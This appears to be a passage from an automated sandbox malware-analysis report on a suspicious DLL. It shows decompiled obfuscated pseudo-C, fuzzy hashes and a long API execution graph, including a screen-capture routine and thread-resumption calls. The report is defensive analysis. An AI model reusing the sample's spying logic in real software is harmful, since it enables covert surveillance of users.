            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: AddressCw242Proc$AllocMqae01idVirtual
            • String ID: &$r(
            • API String ID: 1422986367-2886967036
            • Opcode ID: 827b6f0de347a1d9e78845b0b84c984fda7312979fd4f52ef06c6568f675e1b8
            • Instruction ID: 789f9c777a2ec3f8db38928147d4ba24ffb983072f7d79f474136505c6188d1c
            • Opcode Fuzzy Hash: 827b6f0de347a1d9e78845b0b84c984fda7312979fd4f52ef06c6568f675e1b8
            • Instruction Fuzzy Hash: F5F1EC726083419FE354CF68C984A5BFBE4FB88348F048A2DF5989B391D778E954CB52
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D51A07D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144threadCOMMON
            Download Yara Rule
            C-Code - Quality: 19%
            			E6D51A07D() {
				intOrPtr _t61;
				void* _t100;
				signed int _t122;
				intOrPtr _t123;
				signed int _t124;
				void* _t127;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr _t131;
				signed int _t134;
				intOrPtr _t137;
				intOrPtr _t140;
				intOrPtr _t142;
				intOrPtr _t143;
				void* _t145;
				void* _t147;

				_t61 =  *((intOrPtr*)(_t147 + 0x48));
				_t124 = _t61 - 0x252e;
				_t130 =  *((intOrPtr*)(_t147 + 0x20)) + 0x2c4;
				 *(_t147 + 0x50) = _t124;
				_t122 = _t61 + 0x484;
				_t140 =  *((intOrPtr*)(_t147 + 0x48)) + 0xffffe185;
				 *((intOrPtr*)(_t147 + 0x14)) = _t130;
				_t134 =  *((intOrPtr*)(_t147 + 0x44)) + 0xfffffc3c;
				 *((intOrPtr*)(_t147 + 0x10)) = _t140;
				_t145 =  *((intOrPtr*)(_t147 + 0x24)) + 0x56b;
				 *(_t147 + 0x30) = _t134;
				if(_t124 != _t130 + 0x616) {
					if(_t140 > _t122 + 0x2de) {
						_t142 =  *((intOrPtr*)(_t147 + 0x28));
						if( *((intOrPtr*)(_t142 + 0x74)) <= ( *(_t142 + 0x168) ^  *(_t142 + 0x104) | _t122)) {
							__imp__ActivateActCtx( *((intOrPtr*)(_t142 + 0x80)) + _t124,  *(_t142 + 0x48) &  *(_t142 + 0x130) & 0x0000ffff, _t124 & 0x00002ab3, ( *(_t142 + 0x130) -  *((intOrPtr*)(_t142 + 0xbc))) * 0x2ac3, _t145 - _t130);
							_push(( *(_t142 + 0x4c) & _t122) + 0x2ac3);
							_push(( *(_t142 + 0xd8) ^  *(_t142 + 0x5c)) -  *((intOrPtr*)(_t147 + 0x44)) + 0x6b3);
							_push(_t134 ^ 0x0000252e);
							ResumeThread( *(_t142 + 0x110) ^ 0x00001e7b);
						}
					} else {
						_t143 =  *((intOrPtr*)(_t147 + 0x54));
						_t137 =  *((intOrPtr*)(_t147 + 0x28));
						_push(_t122 + 0x101);
						_push(_t124 + 0x29d1);
						_push( *((intOrPtr*)(_t147 + 0x58)) + 0x88);
						_push(_t137);
						_t19 = _t143 + 0x71f; // 0x6d50205b
						_push( *((intOrPtr*)(_t147 + 0x24)) + 0x2749);
						_push( *((intOrPtr*)(_t147 + 0x54)) + 0xfffffd25);
						_push( *((intOrPtr*)(_t147 + 0x4c)) + 0x13c);
						_t23 = _t143 + 0xfb7; // 0x6d5028f3
						_push( *((intOrPtr*)(_t147 + 0x40)) + 0x345);
						_t100 = E6D501986();
						_t131 =  *((intOrPtr*)(_t147 + 0x38));
						_t127 = _t100;
						_push(_t145 - 0xc5);
						_push(_t131 + 0x21e9);
						_t29 = _t147 + 0x80; // 0x6d50205b
						_t123 =  *_t29;
						_push(_t122 - 0xbbf);
						_push(_t123 + 0x73b);
						_push(_t123 + 0x956);
						_push(_t137);
						_push(_t131 + 0x252e);
						_t33 = _t127 - 0x606; // -1542
						_push( *((intOrPtr*)(_t147 + 0x5c)) + 0xfffff9ce);
						_push(_t123 + 0x7a4);
						_t36 = _t127 + 0x1dd; // 0x1dd
						_t128 =  *((intOrPtr*)(_t147 + 0x8c));
						_t38 = _t143 + 0xbd5; // 0x6d502511
						_push( *((intOrPtr*)(_t147 + 0xb0)) + 0x1df3);
						_push(_t128 + 0x241);
						_push(_t128 + 0x251);
						_t42 = _t143 + 0x5bf; // 0x6d501efb
						E6D51724F();
						_t147 = _t147 + 0x68;
						 *((intOrPtr*)(_t137 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x88)) + 0x1c)) + 0x1b061;
					}
				}
				return  *((intOrPtr*)(_t147 + 0x4c));
			}



















            0x6d51a07f
            0x6d51a08d
            0x6d51a093
            0x6d51a099
            0x6d51a0a2
            0x6d51a0b3
            0x6d51a0b9
            0x6d51a0bd
            0x6d51a0c3
            0x6d51a0c7
            0x6d51a0cd
            0x6d51a0d3
            0x6d51a0e1
            0x6d51a1e8
            0x6d51a1fd
            0x6d51a235
            0x6d51a257
            0x6d51a26a
            0x6d51a26b
            0x6d51a26d
            0x6d51a26d
            0x6d51a0e7
            0x6d51a0e7
            0x6d51a0f1
            0x6d51a0f5
            0x6d51a0fc
            0x6d51a106
            0x6d51a107
            0x6d51a108
            0x6d51a118
            0x6d51a122
            0x6d51a12c
            0x6d51a12d
            0x6d51a13d
            0x6d51a13e
            0x6d51a143
            0x6d51a147
            0x6d51a14f
            0x6d51a156
            0x6d51a15d
            0x6d51a15d
            0x6d51a164
            0x6d51a16b
            0x6d51a172
            0x6d51a173
            0x6d51a17a
            0x6d51a17b
            0x6d51a18b
            0x6d51a192
            0x6d51a193
            0x6d51a199
            0x6d51a1a1
            0x6d51a1b4
            0x6d51a1bb
            0x6d51a1c2
            0x6d51a1c3
            0x6d51a1ca
            0x6d51a1d5
            0x6d51a1e0
            0x6d51a1e0
            0x6d51a0e1
            0x6d51a27d

            APIs
            • ActivateActCtx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6D50193C,?,?,?,?), ref: 6D51A235
            • ResumeThread.KERNEL32(?,?,?,?), ref: 6D51A26D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: ActivateResumeThread
            • String ID: [ Pm
            • API String ID: 2475288038-2361217518
            • Opcode ID: a023ff0076ea37238bbd7245d655c8925f9e39c9c9fb96a15f9315bc7cb49a12
            • Instruction ID: f36e8007d197fab6f30abf2e97706bcf3353a6a97da4c688237e00c97e0fcadc
            • Opcode Fuzzy Hash: a023ff0076ea37238bbd7245d655c8925f9e39c9c9fb96a15f9315bc7cb49a12
            • Instruction Fuzzy Hash: 7E511872504605AFD711CB68CC85EDBB3ECFB88304F040A6AF99AD7241D735FA458B65
            Uniqueness

            Uniqueness Score: -1.00%

            Execution Graph

            Execution Coverage:4.7%
            Dynamic/Decrypted Code Coverage:49.6%
            Signature Coverage:1.8%
            Total number of Nodes:2000
            Total number of Limit Nodes:80
            execution_graph 20951 6d515750 20952 6d5157b0 20951->20952 20953 6d5157d4 GetProcessHeap 20952->20953 20956 6d5157cd ___scrt_fastfail 20952->20956 20954 6d51583f 20953->20954 20955 6d515868 RtlAllocateHeap 20954->20955 20954->20956 20955->20956 24146 27a5769 24165 27a9eb5 24146->24165 24149 27a586a 24151 27a5798 24151->24149 24152 27a9f75 2 API calls 24151->24152 24153 27a57b0 24152->24153 24154 27a9faf 2 API calls 24153->24154 24155 27a57c5 24154->24155 24156 27a8d2e 2 API calls 24155->24156 24157 27a57cd 24156->24157 24158 27a8d86 2 API calls 24157->24158 24159 27a57e8 24158->24159 24160 27ab798 2 API calls 24159->24160 24162 27a57f6 24160->24162 24161 27ac413 11 API calls 24161->24162 24162->24161 24163 27a585f 24162->24163 24164 27a8d86 2 API calls 24163->24164 24164->24149 24166 27a9890 2 API calls 24165->24166 24167 27a9ed6 24166->24167 24168 27a9bf7 2 API calls 24167->24168 24169 27a5781 24168->24169 24169->24149 24170 27a8d70 RtlAllocateHeap 24169->24170 24170->24151 21198 6d50aa78 21209 6d50d854 21198->21209 21204 6d50b3fe ___free_lconv_mon 20 API calls 21206 6d50aaca 21204->21206 21205 6d50aaa0 21207 6d50b3fe ___free_lconv_mon 20 API calls 21205->21207 21208 6d50aa95 21207->21208 21208->21204 21210 6d50d85d 21209->21210 21211 6d50aa8a 21209->21211 21243 6d50d753 21210->21243 21213 6d50dcab GetEnvironmentStringsW 21211->21213 21214 6d50dcc2 21213->21214 21215 6d50dd18 21213->21215 21216 6d50dcc8 WideCharToMultiByte 21214->21216 21217 6d50aa8f 21215->21217 21218 6d50dd1e FreeEnvironmentStringsW 21215->21218 21216->21215 21219 6d50dce4 21216->21219 21217->21208 21226 6d50ab24 21217->21226 21218->21217 21220 6d50b438 __onexit 21 API calls 21219->21220 21221 6d50dcea 21220->21221 21222 6d50dcf1 WideCharToMultiByte 21221->21222 21223 6d50dd07 21221->21223 21222->21223 21224 6d50b3fe ___free_lconv_mon 20 API calls 21223->21224 21225 6d50dd15 21224->21225 21225->21215 21227 6d50ab39 21226->21227 21228 6d50b523 __dosmaperr 20 API calls 21227->21228 21238 6d50ab60 21228->21238 21229 6d50abc4 21230 6d50b3fe ___free_lconv_mon 20 API calls 21229->21230 21231 6d50abde 21230->21231 21231->21205 21232 6d50b523 __dosmaperr 20 API calls 21232->21238 21233 6d50abc6 21623 6d50acef 21233->21623 21237 6d50b3fe ___free_lconv_mon 20 API calls 21237->21229 21238->21229 21238->21232 21238->21233 21239 6d50abe8 21238->21239 21241 6d50b3fe ___free_lconv_mon 20 API calls 21238->21241 21614 6d50b486 21238->21614 21629 6d50beb6 IsProcessorFeaturePresent 21239->21629 21241->21238 21242 6d50abf4 21263 6d50c854 GetLastError 21243->21263 21245 6d50d760 21283 6d50d872 21245->21283 21247 6d50d768 21292 6d50d4e7 21247->21292 21250 6d50d77f 21250->21211 21251 6d50b438 __onexit 21 API calls 21252 6d50d790 21251->21252 21253 6d50d7c2 21252->21253 21299 6d50d914 21252->21299 21256 6d50b3fe ___free_lconv_mon 20 API calls 21253->21256 21256->21250 21257 6d50d7bd 21258 6d50bf62 __dosmaperr 20 API calls 21257->21258 21258->21253 21259 6d50d806 21259->21253 21309 6d50d3bd 21259->21309 21260 6d50d7da 21260->21259 21261 6d50b3fe ___free_lconv_mon 20 API calls 21260->21261 21261->21259 21264 6d50c870 21263->21264 21265 6d50c86a 21263->21265 21267 6d50b523 __dosmaperr 20 API calls 21264->21267 21269 6d50c8bf SetLastError 21264->21269 21266 6d50cbf4 __dosmaperr 11 API calls 21265->21266 21266->21264 21268 6d50c882 21267->21268 21270 6d50c88a 21268->21270 21271 6d50cc4a __dosmaperr 11 API calls 21268->21271 21269->21245 21272 6d50b3fe ___free_lconv_mon 20 API calls 21270->21272 21273 6d50c89f 21271->21273 21274 6d50c890 21272->21274 21273->21270 21275 6d50c8a6 21273->21275 21276 6d50c8cb SetLastError 21274->21276 21277 6d50c69a __dosmaperr 20 API calls 21275->21277 21312 6d50b4e0 21276->21312 21278 6d50c8b1 21277->21278 21280 6d50b3fe ___free_lconv_mon 20 API calls 21278->21280 21282 6d50c8b8 21280->21282 21282->21269 21282->21276 21284 6d50d87e ___scrt_is_nonwritable_in_current_image 21283->21284 21285 6d50c854 _abort 38 API calls 21284->21285 21290 6d50d888 21285->21290 21287 6d50d90c ___scrt_is_nonwritable_in_current_image 21287->21247 21289 6d50b4e0 _abort 38 API calls 21289->21290 21290->21287 21290->21289 21291 6d50b3fe ___free_lconv_mon 20 API calls 21290->21291 21463 6d50c2f6 EnterCriticalSection 21290->21463 21464 6d50d903 21290->21464 21291->21290 21468 6d50b580 21292->21468 21295 6d50d508 GetOEMCP 21298 6d50d531 21295->21298 21296 6d50d51a 21297 6d50d51f GetACP 21296->21297 21296->21298 21297->21298 21298->21250 21298->21251 21300 6d50d4e7 40 API calls 21299->21300 21301 6d50d933 21300->21301 21304 6d50d984 IsValidCodePage 21301->21304 21306 6d50d93a 21301->21306 21308 6d50d9a9 ___scrt_fastfail 21301->21308 21302 6d508b95 _ValidateLocalCookies 5 API calls 21303 6d50d7b5 21302->21303 21303->21257 21303->21260 21305 6d50d996 GetCPInfo 21304->21305 21304->21306 21305->21306 21305->21308 21306->21302 21505 6d50d5bf GetCPInfo 21308->21505 21578 6d50d37a 21309->21578 21311 6d50d3e1 21311->21253 21323 6d50e5c2 21312->21323 21315 6d50b4fa IsProcessorFeaturePresent 21319 6d50b505 21315->21319 21316 6d50b518 21359 6d50a733 21316->21359 21318 6d50b4f0 21318->21315 21318->21316 21353 6d50bcdc 21319->21353 21362 6d50e530 21323->21362 21326 6d50e61d 21327 6d50e629 _abort 21326->21327 21328 6d50c8d8 __dosmaperr 20 API calls 21327->21328 21332 6d50e656 _abort 21327->21332 21335 6d50e650 _abort 21327->21335 21328->21335 21329 6d50e6a2 21330 6d50bf62 __dosmaperr 20 API calls 21329->21330 21331 6d50e6a7 21330->21331 21333 6d50bea6 __cftof 26 API calls 21331->21333 21338 6d50e6ce 21332->21338 21376 6d50c2f6 EnterCriticalSection 21332->21376 21352 6d50e685 21333->21352 21335->21329 21335->21332 21335->21352 21340 6d50e72d 21338->21340 21342 6d50e725 21338->21342 21349 6d50e758 21338->21349 21377 6d50c33e LeaveCriticalSection 21338->21377 21340->21349 21378 6d50e614 21340->21378 21343 6d50a733 _abort 28 API calls 21342->21343 21343->21340 21346 6d50c854 _abort 38 API calls 21350 6d50e7bb 21346->21350 21348 6d50e614 _abort 38 API calls 21348->21349 21381 6d50e7dd 21349->21381 21351 6d50c854 _abort 38 API calls 21350->21351 21350->21352 21351->21352 21385 6d513339 21352->21385 21354 6d50bcf8 _abort ___scrt_fastfail 21353->21354 21355 6d50bd24 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 21354->21355 21358 6d50bdf5 _abort 21355->21358 21356 6d508b95 _ValidateLocalCookies 5 API calls 21357 6d50be13 21356->21357 21357->21316 21358->21356 21389 6d50a50d 21359->21389 21365 6d50e4d6 21362->21365 21364 6d50b4e5 21364->21318 21364->21326 21366 6d50e4e2 ___scrt_is_nonwritable_in_current_image 21365->21366 21371 6d50c2f6 EnterCriticalSection 21366->21371 21368 6d50e4f0 21372 6d50e524 21368->21372 21370 6d50e517 ___scrt_is_nonwritable_in_current_image 21370->21364 21371->21368 21375 6d50c33e LeaveCriticalSection 21372->21375 21374 6d50e52e 21374->21370 21375->21374 21376->21338 21377->21342 21379 6d50c854 _abort 38 API calls 21378->21379 21380 6d50e619 21379->21380 21380->21348 21382 6d50e7e3 21381->21382 21383 6d50e7ac 21381->21383 21388 6d50c33e LeaveCriticalSection 21382->21388 21383->21346 21383->21350 21383->21352 21386 6d508b95 _ValidateLocalCookies 5 API calls 21385->21386 21387 6d513344 21386->21387 21387->21387 21388->21383 21390 6d50a519 _abort 21389->21390 21391 6d50a531 21390->21391 21411 6d50a667 GetModuleHandleW 21390->21411 21420 6d50c2f6 EnterCriticalSection 21391->21420 21395 6d50a5d7 21424 6d50a617 21395->21424 21399 6d50a5ae 21403 6d50a5c6 21399->21403 21408 6d50a2c6 _abort 5 API calls 21399->21408 21400 6d50a539 21400->21395 21400->21399 21421 6d50b207 21400->21421 21401 6d50a620 21407 6d513339 _abort 5 API calls 21401->21407 21402 6d50a5f4 21427 6d50a626 21402->21427 21404 6d50a2c6 _abort 5 API calls 21403->21404 21404->21395 21410 6d50a625 21407->21410 21408->21403 21412 6d50a525 21411->21412 21412->21391 21413 6d50a6ab GetModuleHandleExW 21412->21413 21414 6d50a6d5 GetProcAddress 21413->21414 21415 6d50a6ea 21413->21415 21414->21415 21416 6d50a707 21415->21416 21417 6d50a6fe FreeLibrary 21415->21417 21418 6d508b95 _ValidateLocalCookies 5 API calls 21416->21418 21417->21416 21419 6d50a711 21418->21419 21419->21391 21420->21400 21435 6d50af21 21421->21435 21456 6d50c33e LeaveCriticalSection 21424->21456 21426 6d50a5f0 21426->21401 21426->21402 21457 6d50ce0f 21427->21457 21430 6d50a654 21433 6d50a6ab _abort 8 API calls 21430->21433 21431 6d50a634 GetPEB 21431->21430 21432 6d50a644 GetCurrentProcess TerminateProcess 21431->21432 21432->21430 21434 6d50a65c ExitProcess 21433->21434 21438 6d50aed0 21435->21438 21437 6d50af45 21437->21399 21439 6d50aedc ___scrt_is_nonwritable_in_current_image 21438->21439 21446 6d50c2f6 EnterCriticalSection 21439->21446 21441 6d50aeea 21447 6d50af90 21441->21447 21445 6d50af08 ___scrt_is_nonwritable_in_current_image 21445->21437 21446->21441 21448 6d50afb0 21447->21448 21449 6d50afb8 21447->21449 21450 6d508b95 _ValidateLocalCookies 5 API calls 21448->21450 21449->21448 21452 6d50b3fe ___free_lconv_mon 20 API calls 21449->21452 21451 6d50aef7 21450->21451 21453 6d50af15 21451->21453 21452->21448 21454 6d50c33e _abort LeaveCriticalSection 21453->21454 21455 6d50af1f 21454->21455 21455->21445 21456->21426 21458 6d50ce34 21457->21458 21459 6d50ce2a 21457->21459 21460 6d50c9bd __dosmaperr 5 API calls 21458->21460 21461 6d508b95 _ValidateLocalCookies 5 API calls 21459->21461 21460->21459 21462 6d50a630 21461->21462 21462->21430 21462->21431 21463->21290 21467 6d50c33e LeaveCriticalSection 21464->21467 21466 6d50d90a 21466->21290 21467->21466 21469 6d50b59d 21468->21469 21470 6d50b593 21468->21470 21469->21470 21471 6d50c854 _abort 38 API calls 21469->21471 21470->21295 21470->21296 21472 6d50b5be 21471->21472 21476 6d50eb6c 21472->21476 21477 6d50b5d7 21476->21477 21478 6d50eb7f 21476->21478 21480 6d50eb99 21477->21480 21478->21477 21484 6d50fbdd 21478->21484 21481 6d50ebc1 21480->21481 21482 6d50ebac 21480->21482 21481->21470 21482->21481 21483 6d50d872 __fassign 38 API calls 21482->21483 21483->21481 21485 6d50fbe9 ___scrt_is_nonwritable_in_current_image 21484->21485 21486 6d50c854 _abort 38 API calls 21485->21486 21487 6d50fbf2 21486->21487 21488 6d50fc40 ___scrt_is_nonwritable_in_current_image 21487->21488 21496 6d50c2f6 EnterCriticalSection 21487->21496 21488->21477 21490 6d50fc10 21497 6d50fc54 21490->21497 21495 6d50b4e0 _abort 38 API calls 21495->21488 21496->21490 21498 6d50fc24 21497->21498 21499 6d50fc62 __fassign 21497->21499 21501 6d50fc43 21498->21501 21499->21498 21500 6d50f990 __fassign 20 API calls 21499->21500 21500->21498 21504 6d50c33e LeaveCriticalSection 21501->21504 21503 6d50fc37 21503->21488 21503->21495 21504->21503 21509 6d50d5f9 21505->21509 21514 6d50d6a3 21505->21514 21508 6d508b95 _ValidateLocalCookies 5 API calls 21511 6d50d74f 21508->21511 21515 6d5103c3 21509->21515 21511->21306 21513 6d51071d 43 API calls 21513->21514 21514->21508 21516 6d50b580 __fassign 38 API calls 21515->21516 21517 6d5103e3 MultiByteToWideChar 21516->21517 21519 6d510421 21517->21519 21526 6d5104b9 21517->21526 21521 6d50b438 __onexit 21 API calls 21519->21521 21527 6d510442 ___scrt_fastfail 21519->21527 21520 6d508b95 _ValidateLocalCookies 5 API calls 21522 6d50d65a 21520->21522 21521->21527 21529 6d51071d 21522->21529 21523 6d5104b3 21534 6d5104e0 21523->21534 21525 6d510487 MultiByteToWideChar 21525->21523 21528 6d5104a3 GetStringTypeW 21525->21528 21526->21520 21527->21523 21527->21525 21528->21523 21530 6d50b580 __fassign 38 API calls 21529->21530 21531 6d510730 21530->21531 21538 6d510500 21531->21538 21535 6d5104ec 21534->21535 21536 6d5104fd 21534->21536 21535->21536 21537 6d50b3fe ___free_lconv_mon 20 API calls 21535->21537 21536->21526 21537->21536 21540 6d51051b 21538->21540 21539 6d510541 MultiByteToWideChar 21541 6d5106f5 21539->21541 21542 6d51056b 21539->21542 21540->21539 21543 6d508b95 _ValidateLocalCookies 5 API calls 21541->21543 21545 6d50b438 __onexit 21 API calls 21542->21545 21548 6d51058c 21542->21548 21544 6d50d67b 21543->21544 21544->21513 21545->21548 21546 6d5105d5 MultiByteToWideChar 21547 6d510641 21546->21547 21549 6d5105ee 21546->21549 21551 6d5104e0 __freea 20 API calls 21547->21551 21548->21546 21548->21547 21565 6d50cd05 21549->21565 21551->21541 21553 6d510650 21555 6d50b438 __onexit 21 API calls 21553->21555 21558 6d510671 21553->21558 21554 6d510618 21554->21547 21556 6d50cd05 11 API calls 21554->21556 21555->21558 21556->21547 21557 6d5106e6 21560 6d5104e0 __freea 20 API calls 21557->21560 21558->21557 21559 6d50cd05 11 API calls 21558->21559 21561 6d5106c5 21559->21561 21560->21547 21561->21557 21562 6d5106d4 WideCharToMultiByte 21561->21562 21562->21557 21563 6d510714 21562->21563 21564 6d5104e0 __freea 20 API calls 21563->21564 21564->21547 21566 6d50c9bd __dosmaperr 5 API calls 21565->21566 21567 6d50cd2c 21566->21567 21570 6d50cd35 21567->21570 21573 6d50cd8d 21567->21573 21571 6d508b95 _ValidateLocalCookies 5 API calls 21570->21571 21572 6d50cd87 21571->21572 21572->21547 21572->21553 21572->21554 21574 6d50c9bd __dosmaperr 5 API calls 21573->21574 21575 6d50cdb4 21574->21575 21576 6d508b95 _ValidateLocalCookies 5 API calls 21575->21576 21577 6d50cd75 LCMapStringW 21576->21577 21577->21570 21579 6d50d386 ___scrt_is_nonwritable_in_current_image 21578->21579 21586 6d50c2f6 EnterCriticalSection 21579->21586 21581 6d50d390 21587 6d50d3e5 21581->21587 21585 6d50d3a9 ___scrt_is_nonwritable_in_current_image 21585->21311 21586->21581 21599 6d50db05 21587->21599 21589 6d50d433 21590 6d50db05 26 API calls 21589->21590 21591 6d50d44f 21590->21591 21592 6d50db05 26 API calls 21591->21592 21593 6d50d46d 21592->21593 21594 6d50d39d 21593->21594 21595 6d50b3fe ___free_lconv_mon 20 API calls 21593->21595 21596 6d50d3b1 21594->21596 21595->21594 21613 6d50c33e LeaveCriticalSection 21596->21613 21598 6d50d3bb 21598->21585 21600 6d50db16 21599->21600 21604 6d50db12 21599->21604 21601 6d50db1d 21600->21601 21605 6d50db30 ___scrt_fastfail 21600->21605 21602 6d50bf62 __dosmaperr 20 API calls 21601->21602 21603 6d50db22 21602->21603 21606 6d50bea6 __cftof 26 API calls 21603->21606 21604->21589 21605->21604 21607 6d50db67 21605->21607 21608 6d50db5e 21605->21608 21606->21604 21607->21604 21611 6d50bf62 __dosmaperr 20 API calls 21607->21611 21609 6d50bf62 __dosmaperr 20 API calls 21608->21609 21610 6d50db63 21609->21610 21612 6d50bea6 __cftof 26 API calls 21610->21612 21611->21610 21612->21604 21613->21598 21615 6d50b493 21614->21615 21616 6d50b4a1 21614->21616 21615->21616 21620 6d50b4b8 21615->21620 21617 6d50bf62 __dosmaperr 20 API calls 21616->21617 21618 6d50b4a9 21617->21618 21619 6d50bea6 __cftof 26 API calls 21618->21619 21621 6d50b4b3 21619->21621 21620->21621 21622 6d50bf62 __dosmaperr 20 API calls 21620->21622 21621->21238 21622->21618 21624 6d50abcc 21623->21624 21625 6d50acfc 21623->21625 21624->21237 21626 6d50ad13 21625->21626 21627 6d50b3fe ___free_lconv_mon 20 API calls 21625->21627 21628 6d50b3fe ___free_lconv_mon 20 API calls 21626->21628 21627->21625 21628->21624 21630 6d50bec1 21629->21630 21631 6d50bcdc _abort 8 API calls 21630->21631 21632 6d50bed6 GetCurrentProcess TerminateProcess 21631->21632 21632->21242 21796 27afc56 21799 27a8d70 RtlAllocateHeap 21796->21799 21798 27afc66 21799->21798 24350 27a5746 24355 27ae5e3 24350->24355 24353 27a575b GetLastError 24354 27a5764 24353->24354 24380 27a8d70 RtlAllocateHeap 24355->24380 24357 27ae5fa 24358 27a5757 24357->24358 24359 27a9a5a RtlAllocateHeap 24357->24359 24358->24353 24358->24354 24360 27ae60f 24359->24360 24360->24358 24381 27aa608 24360->24381 24363 27a9f8f 2 API calls 24364 27ae62f 24363->24364 24365 27a9fee 2 API calls 24364->24365 24366 27ae644 24365->24366 24367 27a8d41 2 API calls 24366->24367 24368 27ae64d 24367->24368 24389 27ae433 24368->24389 24370 27ae657 24371 27ae65e 24370->24371 24396 27ae477 24370->24396 24373 27a8d86 2 API calls 24371->24373 24374 27ae731 24373->24374 24375 27a8d86 2 API calls 24374->24375 24376 27ae73c 24375->24376 24377 27a8d86 2 API calls 24376->24377 24377->24358 24378 27ae66d 24378->24371 24379 27ae704 lstrlenW 24378->24379 24379->24378 24380->24357 24382 27aa621 24381->24382 24383 27a8e04 3 API calls 24382->24383 24384 27aa721 24382->24384 24388 27aa69c 24382->24388 24383->24388 24384->24363 24385 27aa6f9 24385->24384 24387 27a8f0a memset 24385->24387 24386 27a8e72 lstrlenW 24386->24388 24387->24384 24388->24385 24388->24386 24390 27a9f8f 2 API calls 24389->24390 24391 27ae445 24390->24391 24392 27a9eb5 4 API calls 24391->24392 24393 27ae44f 24392->24393 24394 27a8d41 2 API calls 24393->24394 24395 27ae45a 24394->24395 24395->24370 24397 27a9bf7 2 API calls 24396->24397 24398 27ae490 CoInitializeEx 24397->24398 24399 27a9f8f 2 API calls 24398->24399 24400 27ae4ab 24399->24400 24401 27a9f8f 2 API calls 24400->24401 24402 27ae4bc 24401->24402 24403 27a8d41 2 API calls 24402->24403 24404 27ae4d8 24403->24404 24405 27a8d41 2 API calls 24404->24405 24406 27ae4ee 24405->24406 24407 27a8d86 2 API calls 24406->24407 24408 27ae4f9 24407->24408 24408->24378 22000 27a2845 22001 27a2938 22000->22001 22002 27a285c 22000->22002 22003 27a9dc9 2 API calls 22001->22003 22004 27abfd9 2 API calls 22002->22004 22005 27a2944 22003->22005 22006 27a2868 22004->22006 22006->22001 22030 27a9f1e 22006->22030 22009 27a292a 22011 27a8d86 2 API calls 22009->22011 22010 27a9acd 2 API calls 22012 27a288c 22010->22012 22011->22001 22034 27abf67 22012->22034 22014 27a289f 22015 27a9acd 2 API calls 22014->22015 22029 27a2911 22014->22029 22017 27a28ab 22015->22017 22016 27a8d86 2 API calls 22018 27a291f 22016->22018 22019 27a109a 2 API calls 22017->22019 22020 27a8d86 2 API calls 22018->22020 22021 27a28b4 22019->22021 22020->22009 22022 27a9bf7 2 API calls 22021->22022 22023 27a28c5 22022->22023 22024 27a8d41 2 API calls 22023->22024 22025 27a28d3 22024->22025 22026 27ab798 2 API calls 22025->22026 22025->22029 22027 27a28f1 22026->22027 22028 27a8d86 2 API calls 22027->22028 22028->22029 22029->22016 22031 27a9f27 22030->22031 22033 27a287a 22030->22033 22037 27a8d70 RtlAllocateHeap 22031->22037 22033->22009 22033->22010 22038 27a8d70 RtlAllocateHeap 22034->22038 22036 27abf8c 22036->22014 22037->22033 22038->22036 24409 27a5f3a 24415 27a8d70 RtlAllocateHeap 24409->24415 24411 27a5fb8 24413 27a5f4f 24413->24411 24414 27aa202 GetSystemTimeAsFileTime 24413->24414 24416 27a5cc4 GetDC 24413->24416 24414->24413 24415->24413 24417 27a5ee4 24416->24417 24418 27a5cf6 CreateCompatibleDC 24416->24418 24420 27a8d86 2 API calls 24417->24420 24418->24417 24419 27a5d07 GetDeviceCaps GetDeviceCaps CreateCompatibleBitmap 24418->24419 24419->24417 24421 27a5d32 SelectObject 24419->24421 24422 27a5f03 24420->24422 24421->24417 24423 27a5d45 BitBlt GetCursorInfo 24421->24423 24424 27a8d86 2 API calls 24422->24424 24425 27a5dcb SelectObject 24423->24425 24426 27a5d76 24423->24426 24427 27a5f0e 24424->24427 24425->24417 24431 27a5ddf GetObjectW 24425->24431 24426->24425 24430 27a5d7b CopyIcon GetIconInfo GetObjectW DrawIconEx 24426->24430 24428 27a5f1c 24427->24428 24429 27a5f15 DeleteDC 24427->24429 24432 27a5f20 DeleteDC 24428->24432 24433 27a5f27 24428->24433 24429->24428 24430->24425 24442 27a8d70 RtlAllocateHeap 24431->24442 24432->24433 24435 27a5f2b DeleteObject 24433->24435 24436 27a5f32 24433->24436 24435->24436 24436->24413 24437 27a5e48 24437->24417 24438 27a5e54 GetDIBits 24437->24438 24443 27a8d70 RtlAllocateHeap 24438->24443 24440 27a5e7a 24440->24417 24441 27afc7b 18 API calls 24440->24441 24441->24417 24442->24437 24443->24440 22186 27a2235 22208 27a9890 22186->22208 22189 27abfd9 2 API calls 22190 27a2284 22189->22190 22191 27a228b 22190->22191 22211 27ac4e2 memset 22190->22211 22193 27a8d86 2 API calls 22191->22193 22194 27a23d5 22193->22194 22195 27a23fc 22194->22195 22197 27a23f1 